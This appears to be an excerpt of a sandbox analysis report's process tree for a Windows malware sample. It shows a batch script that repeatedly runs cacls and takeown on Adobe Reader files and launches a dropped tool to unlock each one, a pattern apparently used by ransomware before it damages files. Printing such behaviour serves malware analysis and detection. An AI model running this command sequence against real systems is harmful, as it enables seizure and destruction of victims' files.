C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "reviews_joined.gif" -nobanner3⤵PID:1572
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "reviews_joined.gif" -nobanner4⤵PID:544
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1292
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf""2⤵PID:1816
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf" /E /G Admin:F /C3⤵PID:1608
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf"3⤵PID:1196
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "MyriadPro-BoldIt.otf" -nobanner3⤵PID:1412
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "MyriadPro-BoldIt.otf" -nobanner4⤵PID:1440
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1164
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif""2⤵PID:996
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif" /E /G Admin:F /C3⤵PID:1464
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif"3⤵
- Modifies file permissions
PID:932
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "server_issue.gif" -nobanner3⤵PID:1804
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "server_issue.gif" -nobanner4⤵PID:432
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:228
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB""2⤵PID:1488
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB" /E /G Admin:F /C3⤵PID:1480
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB"3⤵PID:1236
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "ZY______.PFB" -nobanner3⤵PID:1032
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "ZY______.PFB" -nobanner4⤵PID:1040
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1220
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp""2⤵PID:1728
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp" /E /G Admin:F /C3⤵PID:1796
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp"3⤵
- Modifies file permissions
PID:292
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "brt.hyp" -nobanner3⤵PID:652
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "brt.hyp" -nobanner4⤵PID:1944
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1848
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx""2⤵PID:872
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx" /E /G Admin:F /C3⤵PID:1036
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx"3⤵PID:956
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "can32.clx" -nobanner3⤵PID:1672
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "can32.clx" -nobanner4⤵PID:220
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:236
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp""2⤵PID:1948
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp" /E /G Admin:F /C3⤵PID:1132
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp"3⤵PID:1064
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "SaslPrepProfile_norm_bidi.spp" -nobanner3⤵PID:324
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "SaslPrepProfile_norm_bidi.spp" -nobanner4⤵PID:1832
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1460
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT""2⤵PID:1628
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT" /E /G Admin:F /C3⤵PID:708
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT"3⤵PID:1796
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "GREEK.TXT" -nobanner3⤵PID:292
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "GREEK.TXT" -nobanner4⤵PID:1440
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:652
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT""2⤵PID:1848
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT" /E /G Admin:F /C3⤵PID:936
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT"3⤵
- Modifies file permissions
PID:1036
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "CP1251.TXT" -nobanner3⤵PID:956
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "CP1251.TXT" -nobanner4⤵PID:2020
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1672
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif""2⤵PID:236
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif" /E /G Admin:F /C3⤵PID:1188
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif"3⤵
- Modifies file permissions
PID:1132
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "turnOffNotificationInAcrobat.gif" -nobanner3⤵PID:1572
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "turnOffNotificationInAcrobat.gif" -nobanner4⤵PID:1032
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1460
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf""2⤵PID:1056
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf" /E /G Admin:F /C3⤵PID:792
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf"3⤵PID:1944
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "AdobePiStd.otf" -nobanner3⤵PID:1412
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "AdobePiStd.otf" -nobanner4⤵PID:292
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:652
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf""2⤵PID:820
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf" /E /G Admin:F /C3⤵PID:208
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf"3⤵
- Modifies file permissions
PID:224
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "MinionPro-Regular.otf" -nobanner3⤵PID:1804
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "MinionPro-Regular.otf" -nobanner4⤵PID:956
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1672
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB""2⤵PID:1728
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB" /E /G Admin:F /C3⤵PID:1020
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB"3⤵
- Modifies file permissions
PID:1040
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "SY______.PFB" -nobanner3⤵PID:1292
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "SY______.PFB" -nobanner4⤵PID:520
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:604
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt""2⤵PID:996
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt" /E /G Admin:F /C3⤵PID:792
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt"3⤵PID:1768
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "DisplayLanguageNames.en_US_POSIX.txt" -nobanner3⤵PID:1164
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "DisplayLanguageNames.en_US_POSIX.txt" -nobanner4⤵PID:1488
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:932
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths""2⤵PID:204
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths" /E /G Admin:F /C3⤵PID:1804
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths"3⤵PID:1672
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "can03.ths" -nobanner3⤵PID:820
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "can03.ths" -nobanner4⤵PID:1548
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1236
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths""2⤵PID:1032
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths" /E /G Admin:F /C3⤵PID:1444
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths"3⤵PID:1460
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "usa03.ths" -nobanner3⤵PID:1816
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "usa03.ths" -nobanner4⤵PID:1400
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1768
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT""2⤵PID:1488
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT" /E /G Admin:F /C3⤵PID:220
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT"3⤵
- Modifies file permissions
PID:1196
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "CROATIAN.TXT" -nobanner3⤵PID:1916
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "CROATIAN.TXT" -nobanner4⤵PID:936
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1548
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT""2⤵PID:324
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT" /E /G Admin:F /C3⤵PID:2020
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT"3⤵PID:1528
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "UKRAINE.TXT" -nobanner3⤵PID:1444
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "UKRAINE.TXT" -nobanner4⤵PID:1460
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:516
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif""2⤵PID:792
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif" /E /G Admin:F /C3⤵PID:1600
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif"3⤵PID:1768
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "ended_review_or_form.gif" -nobanner3⤵PID:1032
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "ended_review_or_form.gif" -nobanner4⤵PID:1164
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:220
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif""2⤵PID:1940
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif" /E /G Admin:F /C3⤵PID:316
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif"3⤵
- Modifies file permissions
PID:1972
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "open_original_form.gif" -nobanner3⤵PID:1220
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "open_original_form.gif" -nobanner4⤵PID:1548
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:652
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif""2⤵PID:520
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif" /E /G Admin:F /C3⤵PID:788
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif"3⤵
- Modifies file permissions
PID:1188
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "review_same_reviewers.gif" -nobanner3⤵PID:212
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "review_same_reviewers.gif" -nobanner4⤵PID:228
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1796
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif""2⤵PID:1628
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif" /E /G Admin:F /C3⤵PID:208
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif"3⤵
- Modifies file permissions
PID:1032
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "tl.gif" -nobanner3⤵PID:1944
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "tl.gif" -nobanner4⤵PID:1484
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1960
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm""2⤵PID:316
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm" /E /G Admin:F /C3⤵PID:932
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm"3⤵
- Modifies file permissions
PID:1220
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "ReadMe.htm" -nobanner3⤵PID:1020
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "ReadMe.htm" -nobanner4⤵PID:1196
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1640
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf""2⤵PID:216
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf" /E /G Admin:F /C3⤵PID:1040
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf"3⤵PID:212
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "MinionPro-Bold.otf" -nobanner3⤵PID:912
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "MinionPro-Bold.otf" -nobanner4⤵PID:2020
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1268
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM""2⤵PID:208
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM" /E /G Admin:F /C3⤵PID:1400
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM"3⤵PID:1944
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "SY______.PFM" -nobanner3⤵PID:1960
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "SY______.PFM" -nobanner4⤵PID:1948
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1916
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt""2⤵PID:932
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt" /E /G Admin:F /C3⤵PID:1940
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt"3⤵
- Modifies file permissions
PID:268
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "DisplayLanguageNames.en_GB.txt" -nobanner3⤵PID:1528
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "DisplayLanguageNames.en_GB.txt" -nobanner4⤵PID:820
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1444
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths""2⤵PID:1040
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths" /E /G Admin:F /C3⤵PID:604
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths"3⤵PID:1796
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "brt55.ths" -nobanner3⤵PID:1132
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "brt55.ths" -nobanner4⤵PID:1580
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1268
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env""2⤵PID:1236
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env" /E /G Admin:F /C3⤵PID:1824
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env"3⤵PID:936
-
-
